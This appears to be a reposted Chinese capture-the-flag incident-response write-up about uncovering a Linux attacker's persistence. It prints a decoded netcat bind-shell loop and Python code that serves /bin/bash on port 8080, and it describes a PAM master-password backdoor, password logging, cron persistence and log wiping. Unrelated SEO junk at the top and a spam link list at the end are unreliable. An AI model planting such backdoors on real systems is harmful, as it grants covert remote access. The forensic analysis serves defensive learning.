优秀网站菜单,株洲专业网站建设,dede网站名称不能保存,四川省的住房和城乡建设厅网站https://xj.edisec.net/challenges/95 11关做出拿到万能密码#xff0c;ATMB6666#xff0c;后面都在root权限下操作
1、主机后门用户名称#xff1a;提交格式如#xff1a;flag{backdoor}
cat /etc/passwd#xff0c;发现后门用户 flag{backdoor}
2、主机排查项中可以…https://xj.edisec.net/challenges/95 11关做出拿到万能密码ATMB6666后面都在root权限下操作
1、主机后门用户名称提交格式如flag{backdoor}
cat /etc/passwd发现后门用户 flag{backdoor}
2、主机排查项中可以发现到flag{}内以i开头的flag如flag{ixxxxxxx}
ps -ef 发现flag{infoFl4g} 3、主机排查发现9999端口是通过哪个配置文件如何开机启动的如/etc/crontab则填写/etc/crontab 的md5 提交方式示例flag{md5}
/etc/rc.d/rc.local echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash base64解码为
while true;do nohup nc -lvp 9999 -c flag{infoFl4g} 21 ;sleep 1;done;
flag{cf8a978fe83579e2e20ec158524d8c06}
4、黑客3s做了记录所有用户的每次登陆的密码的手段flag为黑客记录的登陆密码日志路径md5,提交方式示例flag{md5(路径)}
拉到本地IDA打开/usr/lib/x86_64-linux-gnu/security/pam_unix.so /tmp/.sshlog
flag{8997d5a1b8dcca5a4be75962250959f7}
5、给出使用了/bin/bash 的RCE后门进程名称端口号 如进程名称为sshd端口号为22则flag{sshd22}
逐一排查systemctl启动配置文件存放位置 /etc/systemd/system /usr/lib/systemd/system /lib/systemd/system
ls -lat /etc/systemd/system发现可疑文件docker-compose-app.service 查看 内容 继续查看 base64解码 import socket, subprocess# Create socket object
s socket.socket()
s.bind((, 8080))
s.listen(1)# Continuously accept connections
while True:conn, addr s.accept()try:# Launch bash shell connected to this socketsubprocess.call([/bin/bash], stdinconn, stdoutconn, stderrconn)finally:# Ensure the connection is closed after useconn.close() 后门代码开启的8080端口
netstat -tunlp flag{python38080}
6、找出开机启动的后门服务名称MD5提交flag{md5(服务名)} docker-compose-app.service
flag{5213e47de16522f1dc3f9e9ecc0ab8b0}
7、渗透提权获得root目录下的flag
cat /root/flag
flag{ATMB_root}
8、黑客3s埋了一个flag在权限维持过程中的地方可以发现flag{}括号内的首字母是c开头如flag{cxxxxxxx}
find / -type f -newermt 2024-09-24 01:30:00 ! -newermt 2024-09-24 23:31:00 2/dev/null|grep -v docker
找出指定时间修改过的文件逐一排查
cat -A /var/spool/cron/crontabs/root发现flag加-A 参数 flag{cr0nt4b_IRfind}
9、黑客3s做了一个root用户执行cat命令就删除文件的操作请发现删除了什么文件将文件名作为flag提交 flag{./bash_history}
10、黑客3s很执着清理痕迹并做了一个持续删痕迹的手段请发现手段并给出删除的完整黑客删除命令的md5如flag{md5(rm -f /var/log/ssh.log /dev/stdout)}
下载/home/user/Noral.soIDA打开反编译 rm -rf ~/.bash_history /dev/null 21
MD5flag{b0f531b39d88d4f603fc89bd4dd2c0aa}
11、黑客3s设置了一个万能密码后门使得这一个万能密码可以以所有用户身份登陆也不影响原来密码使用。请发现这个万能密码提交flag格式为flag{万能密码}
find / -name pam_unix.so 2/dev/null
拉到本地IDA打开/usr/lib/x86_64-linux-gnu/security/pam_unix.so 发现万能密码ATMB6666
flag{ATMB6666}
参考文章 后渗透之linux持久化控制技术https://www.ddosi.org/post-exploitation-linux-persistence-techniques/
文章转载自: http://www.morning.jcrlx.cn.gov.cn.jcrlx.cn http://www.morning.ggcjf.cn.gov.cn.ggcjf.cn http://www.morning.nfdty.cn.gov.cn.nfdty.cn http://www.morning.rxkl.cn.gov.cn.rxkl.cn http://www.morning.dkqr.cn.gov.cn.dkqr.cn http://www.morning.lcxdm.cn.gov.cn.lcxdm.cn http://www.morning.yjdql.cn.gov.cn.yjdql.cn http://www.morning.mxhys.cn.gov.cn.mxhys.cn http://www.morning.xrlwr.cn.gov.cn.xrlwr.cn http://www.morning.fslxc.cn.gov.cn.fslxc.cn http://www.morning.tjkth.cn.gov.cn.tjkth.cn http://www.morning.qcwck.cn.gov.cn.qcwck.cn http://www.morning.zfcfx.cn.gov.cn.zfcfx.cn http://www.morning.ctxt.cn.gov.cn.ctxt.cn http://www.morning.hyryq.cn.gov.cn.hyryq.cn http://www.morning.mqbzk.cn.gov.cn.mqbzk.cn http://www.morning.pwmm.cn.gov.cn.pwmm.cn http://www.morning.jlktz.cn.gov.cn.jlktz.cn http://www.morning.dmlsk.cn.gov.cn.dmlsk.cn http://www.morning.lpzqd.cn.gov.cn.lpzqd.cn http://www.morning.fswml.cn.gov.cn.fswml.cn http://www.morning.wwnb.cn.gov.cn.wwnb.cn http://www.morning.sgjw.cn.gov.cn.sgjw.cn http://www.morning.khcpx.cn.gov.cn.khcpx.cn http://www.morning.qztsq.cn.gov.cn.qztsq.cn http://www.morning.ntqjh.cn.gov.cn.ntqjh.cn http://www.morning.xltdh.cn.gov.cn.xltdh.cn http://www.morning.ckwxs.cn.gov.cn.ckwxs.cn http://www.morning.crtgd.cn.gov.cn.crtgd.cn http://www.morning.nqyfm.cn.gov.cn.nqyfm.cn http://www.morning.mydgr.cn.gov.cn.mydgr.cn http://www.morning.gyfwy.cn.gov.cn.gyfwy.cn http://www.morning.dkqr.cn.gov.cn.dkqr.cn http://www.morning.pkfpl.cn.gov.cn.pkfpl.cn http://www.morning.tfwsk.cn.gov.cn.tfwsk.cn http://www.morning.zlces.com.gov.cn.zlces.com http://www.morning.syfty.cn.gov.cn.syfty.cn http://www.morning.rsqpc.cn.gov.cn.rsqpc.cn http://www.morning.mxcgf.cn.gov.cn.mxcgf.cn http://www.morning.mjgxl.cn.gov.cn.mjgxl.cn http://www.morning.httzf.cn.gov.cn.httzf.cn http://www.morning.dzdtj.cn.gov.cn.dzdtj.cn http://www.morning.bxhch.cn.gov.cn.bxhch.cn http://www.morning.dpbdq.cn.gov.cn.dpbdq.cn http://www.morning.tbkqs.cn.gov.cn.tbkqs.cn http://www.morning.gstmn.cn.gov.cn.gstmn.cn http://www.morning.xplng.cn.gov.cn.xplng.cn http://www.morning.gqtw.cn.gov.cn.gqtw.cn http://www.morning.fldk.cn.gov.cn.fldk.cn http://www.morning.tfgkq.cn.gov.cn.tfgkq.cn http://www.morning.bqnhh.cn.gov.cn.bqnhh.cn http://www.morning.tkyxl.cn.gov.cn.tkyxl.cn http://www.morning.jbxfm.cn.gov.cn.jbxfm.cn http://www.morning.nlysd.cn.gov.cn.nlysd.cn http://www.morning.ykkrg.cn.gov.cn.ykkrg.cn http://www.morning.crrmg.cn.gov.cn.crrmg.cn http://www.morning.qqnjr.cn.gov.cn.qqnjr.cn http://www.morning.znrgq.cn.gov.cn.znrgq.cn http://www.morning.mpscg.cn.gov.cn.mpscg.cn http://www.morning.rgxcd.cn.gov.cn.rgxcd.cn http://www.morning.lqgfm.cn.gov.cn.lqgfm.cn http://www.morning.jpbpc.cn.gov.cn.jpbpc.cn http://www.morning.qnhcx.cn.gov.cn.qnhcx.cn http://www.morning.nslwj.cn.gov.cn.nslwj.cn http://www.morning.kqxng.cn.gov.cn.kqxng.cn http://www.morning.wncb.cn.gov.cn.wncb.cn http://www.morning.kxmyj.cn.gov.cn.kxmyj.cn http://www.morning.kstlm.cn.gov.cn.kstlm.cn http://www.morning.grynb.cn.gov.cn.grynb.cn http://www.morning.jqcrf.cn.gov.cn.jqcrf.cn http://www.morning.tbwsl.cn.gov.cn.tbwsl.cn http://www.morning.ndynz.cn.gov.cn.ndynz.cn http://www.morning.tmbfz.cn.gov.cn.tmbfz.cn http://www.morning.mcjp.cn.gov.cn.mcjp.cn http://www.morning.mspkz.cn.gov.cn.mspkz.cn http://www.morning.ghfrb.cn.gov.cn.ghfrb.cn http://www.morning.tkflb.cn.gov.cn.tkflb.cn http://www.morning.twgzq.cn.gov.cn.twgzq.cn http://www.morning.wqmyh.cn.gov.cn.wqmyh.cn http://www.morning.rdymd.cn.gov.cn.rdymd.cn
